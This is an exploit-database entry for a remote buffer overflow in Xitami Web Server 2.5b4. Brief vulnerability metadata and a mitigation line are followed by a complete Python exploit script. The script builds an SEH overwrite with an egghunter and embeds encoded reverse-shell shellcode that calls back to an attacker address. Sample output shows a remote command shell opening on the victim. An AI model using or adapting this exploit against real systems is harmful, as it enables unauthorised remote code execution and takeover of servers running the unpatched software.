Xitami Web Server 2.5 Remote Buffer Overflow (SEH + Egghunter)

vendor:

Xitami Web Server

by:

ElSoufiane

7.5

CVSS

HIGH

Remote Buffer Overflow

119

CWE

Product Name: Xitami Web Server

Affected Version From: 2.5b4

Affected Version To: 2.5b4

Patch Exists: NO

Related CWE:

CPE: a:xitami:xitami_web_server:2.5b4

Metasploit:

Other Scripts:

Platforms Tested: Windows Vista Ultimate (Build 6000) and Windows XP SP3 Professional

2019

Xitami Web Server 2.5 Remote Buffer Overflow (SEH + Egghunter)

This exploit targets Xitami Web Server version 2.5b4. By sending a specially crafted payload, an attacker can trigger a remote buffer overflow in the server, allowing them to execute arbitrary code on the target system. The exploit utilizes SEH (Structured Exception Handling) and an egghunter to locate the payload in memory.

Mitigation:

The vendor does not provide a patch for this vulnerability. It is recommended to upgrade to a newer version of the Xitami Web Server that is not affected by this issue.

Source

Exploit-DB raw data:

# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (SEH + Egghunter)
# Date: May 4, 2019
# Author: ElSoufiane
# Version: 2.5b4
# Tested on: Windows Vista Ultimate (Build 6000) and Windows XP SP3 Professional
# Discovered by: Krystian Kloskowski
#
# Set up a multi handler listener in MSFConsole
# then run exploit
#
# root@f6c9fa91b403:~/XitamiWebServer# python exploit.py 192.168.1.149
# [+] Sending exploit payload...
#
# Check the MSFConsole listener
#
# msf5 exploit(multi/handler) > run
# [*] Started reverse TCP handler on 0.0.0.0:5801
# [*] Encoded stage with x86/shikata_ga_nai
# [*] Sending encoded stage (267 bytes) to 172.17.0.1
# [*] Command shell session 6 opened (172.17.0.2:5801 -> 172.17.0.1:39416) at 2019-05-04 00:17:55 +0000



# C:\Xitami>

import socket
import sys
import struct

if len(sys.argv) != 2 :
	print "[+] Usage : python exploit.py [VICTIM_IP]"
	exit(0)

TCP_IP = sys.argv[1]
TCP_PORT = 80


egg = "SOUFSOUF"
nops = "\x90"*10

#msfvenom -p windows/shell/reverse_tcp LPORT=5801 LHOST=192.168.1.129 -f python -v shellcode -e x86/alpha_mixed
shellcode = "\x89\xe0\xd9\xe5\xd9\x70\xf4\x5b\x53\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x68\x68\x6c\x42\x63\x30\x37\x70\x63\x30"
shellcode += "\x51\x70\x6b\x39\x6d\x35\x70\x31\x6f\x30\x70\x64"
shellcode += "\x4e\x6b\x76\x30\x70\x30\x4e\x6b\x76\x32\x54\x4c"
shellcode += "\x6e\x6b\x72\x72\x46\x74\x6c\x4b\x53\x42\x55\x78"
shellcode += "\x34\x4f\x4e\x57\x42\x6a\x35\x76\x30\x31\x59\x6f"
shellcode += "\x4e\x4c\x77\x4c\x70\x61\x31\x6c\x75\x52\x34\x6c"
shellcode += "\x35\x70\x6b\x71\x38\x4f\x56\x6d\x47\x71\x4a\x67"
shellcode += "\x4a\x42\x49\x62\x63\x62\x63\x67\x6e\x6b\x63\x62"
shellcode += "\x52\x30\x4c\x4b\x53\x7a\x77\x4c\x6e\x6b\x70\x4c"
shellcode += "\x72\x31\x31\x68\x59\x73\x30\x48\x53\x31\x68\x51"
shellcode += "\x72\x71\x4e\x6b\x30\x59\x57\x50\x55\x51\x6e\x33"
shellcode += "\x4c\x4b\x73\x79\x72\x38\x48\x63\x56\x5a\x62\x69"
shellcode += "\x4c\x4b\x66\x54\x6c\x4b\x73\x31\x49\x46\x64\x71"
shellcode += "\x4b\x4f\x6c\x6c\x5a\x61\x68\x4f\x66\x6d\x77\x71"
shellcode += "\x69\x57\x30\x38\x4b\x50\x74\x35\x58\x76\x55\x53"
shellcode += "\x71\x6d\x6b\x48\x55\x6b\x73\x4d\x44\x64\x32\x55"
shellcode += "\x4a\x44\x43\x68\x4c\x4b\x70\x58\x31\x34\x65\x51"
shellcode += "\x4a\x73\x62\x46\x4e\x6b\x54\x4c\x52\x6b\x6e\x6b"
shellcode += "\x33\x68\x37\x6c\x43\x31\x4b\x63\x6e\x6b\x34\x44"
shellcode += "\x6c\x4b\x43\x31\x4a\x70\x4c\x49\x37\x34\x37\x54"
shellcode += "\x44\x64\x51\x4b\x73\x6b\x53\x51\x52\x79\x52\x7a"
shellcode += "\x42\x71\x6b\x4f\x69\x70\x71\x4f\x43\x6f\x32\x7a"
shellcode += "\x4c\x4b\x37\x62\x7a\x4b\x4e\x6d\x71\x4d\x55\x38"
shellcode += "\x56\x53\x70\x32\x77\x70\x65\x50\x62\x48\x44\x37"
shellcode += "\x42\x53\x74\x72\x63\x6f\x43\x64\x33\x58\x42\x6c"
shellcode += "\x63\x47\x31\x36\x54\x47\x6d\x59\x6b\x58\x69\x6f"
shellcode += "\x4e\x30\x4e\x58\x4c\x50\x67\x71\x47\x70\x67\x70"
shellcode += "\x37\x59\x4a\x64\x31\x44\x56\x30\x70\x68\x55\x79"
shellcode += "\x4f\x70\x30\x6b\x63\x30\x6b\x4f\x68\x55\x61\x7a"
shellcode += "\x35\x5a\x72\x48\x39\x50\x79\x38\x45\x51\x4f\x71"
shellcode += "\x52\x48\x46\x62\x43\x30\x32\x36\x39\x39\x6c\x49"
shellcode += "\x59\x76\x36\x30\x46\x30\x36\x30\x32\x70\x51\x50"
shellcode += "\x36\x30\x67\x30\x76\x30\x32\x48\x6a\x4a\x56\x6f"
shellcode += "\x79\x4f\x39\x70\x59\x6f\x79\x45\x5a\x37\x70\x6a"
shellcode += "\x46\x70\x71\x46\x63\x67\x30\x68\x6e\x79\x69\x35"
shellcode += "\x44\x34\x30\x61\x59\x6f\x59\x45\x6d\x55\x49\x50"
shellcode += "\x53\x44\x55\x5a\x79\x6f\x30\x4e\x66\x68\x53\x45"
shellcode += "\x6a\x4c\x6a\x48\x52\x47\x73\x30\x33\x30\x73\x30"
shellcode += "\x61\x7a\x55\x50\x33\x5a\x67\x74\x71\x46\x66\x37"
shellcode += "\x62\x48\x45\x52\x68\x59\x4f\x38\x51\x4f\x59\x6f"
shellcode += "\x6b\x65\x4f\x73\x7a\x58\x53\x30\x63\x4e\x57\x46"
shellcode += "\x4c\x4b\x35\x66\x32\x4a\x63\x70\x72\x48\x63\x30"
shellcode += "\x76\x70\x65\x50\x77\x70\x73\x66\x62\x4a\x37\x70"
shellcode += "\x32\x48\x46\x38\x4e\x44\x76\x33\x79\x75\x79\x6f"
shellcode += "\x5a\x75\x6e\x73\x76\x33\x52\x4a\x73\x30\x76\x36"
shellcode += "\x42\x73\x32\x77\x33\x58\x45\x52\x78\x59\x78\x48"
shellcode += "\x61\x4f\x39\x6f\x59\x45\x4d\x53\x49\x68\x45\x50"
shellcode += "\x73\x4d\x61\x38\x71\x48\x62\x48\x55\x50\x53\x70"
shellcode += "\x35\x50\x53\x30\x33\x5a\x45\x50\x76\x30\x33\x58"
shellcode += "\x56\x6b\x34\x6f\x46\x6f\x34\x70\x4b\x4f\x78\x55"
shellcode += "\x71\x47\x75\x38\x31\x65\x70\x6e\x52\x6d\x50\x61"
shellcode += "\x4b\x4f\x79\x45\x33\x6e\x31\x4e\x4b\x4f\x44\x4c"
shellcode += "\x76\x44\x56\x6f\x4e\x65\x72\x50\x79\x6f\x69\x6f"
shellcode += "\x6b\x4f\x68\x69\x4d\x4b\x79\x6f\x79\x6f\x49\x6f"
shellcode += "\x56\x61\x5a\x63\x71\x39\x69\x56\x51\x65\x69\x51"
shellcode += "\x4f\x33\x6d\x6b\x5a\x50\x68\x35\x4e\x42\x50\x56"
shellcode += "\x52\x4a\x57\x70\x36\x33\x69\x6f\x5a\x75\x41\x41"

egghunter ="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"+"SOUF"+"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

nseh_jmp = "\xeb\xaa"	#jmp back 84 bytes
seh = "\x87\x1d\x40"	# (xiwin32.exe) 0x00401d87 -> pop/pop/ret. ( Parial Overwrite )

payload = "A"*120
payload += egghunter
payload += "A"*(190-len(payload))
payload += nseh_jmp
payload += seh

http_req = "GET / HTTP/1.1\r\n"
http_req += "Host: "+ TCP_IP +"\r\n"
http_req += "User-Agent: "+egg+nops+shellcode+"\r\n"
http_req += "If-Modified-Since: Wed, " + payload + "\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."
s.send(http_req)
s.close()